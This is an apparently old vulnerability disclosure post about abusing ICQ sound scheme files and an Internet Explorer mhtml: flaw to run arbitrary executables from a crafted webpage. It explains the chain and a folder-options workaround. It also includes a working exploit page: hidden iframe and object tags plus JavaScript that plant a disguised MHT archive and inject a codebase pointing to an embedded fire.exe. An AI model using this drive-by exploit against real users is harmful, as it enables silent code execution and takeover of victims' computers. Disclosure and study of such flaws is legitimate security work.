<qoute>
I was about to put on a home page
right after I discovered it [and still had a hope that I will be
that one who will finally destroy the world :>]:
</quote>

Well i dont know if it will destroy the world, but sure enough it's enough
to destory a small portion off it :)

Actually i found the "hole" adam discovered myself a few months back but
didn't think it was particularly world shocking at the time so i didnt even
bother to report it (silly me) , Over the course of the last moths I did
some other research and this one was forgotten untill i read adams post this
morning and made the connection with some other research I did.

It does infact allow you to run code of your choosing on a victims machine
by creating a specially crafted webpage and sound scheme file

>>Explaination and example<<

I have created an example exploit on

http://www.xs4all.nl/~jkuperus/icq/icq.htm

that starts a little flame program

It works as followed

the default action for icq soundscheme (scm) files is open it places the wav
files included with the scm file in a known location on the hard disk.

flame.scm wil be downloaded and installed in C:\Program
Files\ICQ\Sounds\flame[1]
the scm file i use creates a auth.wav file .

In reality however this is not a wav file but a mht (mail archive file) with
en embeded base64 encoded executable

then i use one of the many available local code execution vulnerabilities
found in internet explorer recently to execute the embedded binary with this
url :

mhtml:file:///C:/Program%20Files/ICQ/Sounds/flame/Auth.wav!file:///C:/fire.e
xe

I dont think its necisary to use one of ie's exploit as you can also call
html files in the mht archive, But for some reason i wasn't able to get this
to work right away.

>>Workaround <<

For a short term solution

open explorer (the file manager not the browser)
go to the file types tab in tools > folder options

locate the scm extention and change the default behaviour to prompt before
download

In the long term icq will have to use something like random foldernames for
soundschemes to prefent this from happening

<head>

</head>

<body>

<iframe src="jelmer.wsz" style="display:none"></iframe>

<object id="dataObject" type="text/html" data="empty.html" style="display:none"></object>

<textarea id=HtmlInput style="display:none" name="textarea">
<object classid="clsid:11111111-1111-1111-1111-111111111111" codebase="$WHATFILE$"></object>
</textarea>

<span id="dataStatus">Wait a few seconds</span>

<script language="javascript">

setTimeout("ExecuteFile()",5000);

var ref = document.getElementById("dataObject").object, sFile="";

function ExecuteFile(){
dataStatus.innerText = "Loading file";
ref.location.href = "file://c:/fdbfd" + (new Date()).getTime();
sFile = 'mhtml:file:///C:/Program%20Files/Winamp/Skins/jelmer.wsz!file:///C:/fire.exe';
setTimeout("CheckFile()",1000);
}

function CheckFile(){
dataStatus.innerText = "Executing file";
var sHTML = HtmlInput.value.replace(/\$WHATFILE\$/, sFile );
ref.body.insertAdjacentHTML( "beforeEnd" , sHTML );
}

</script>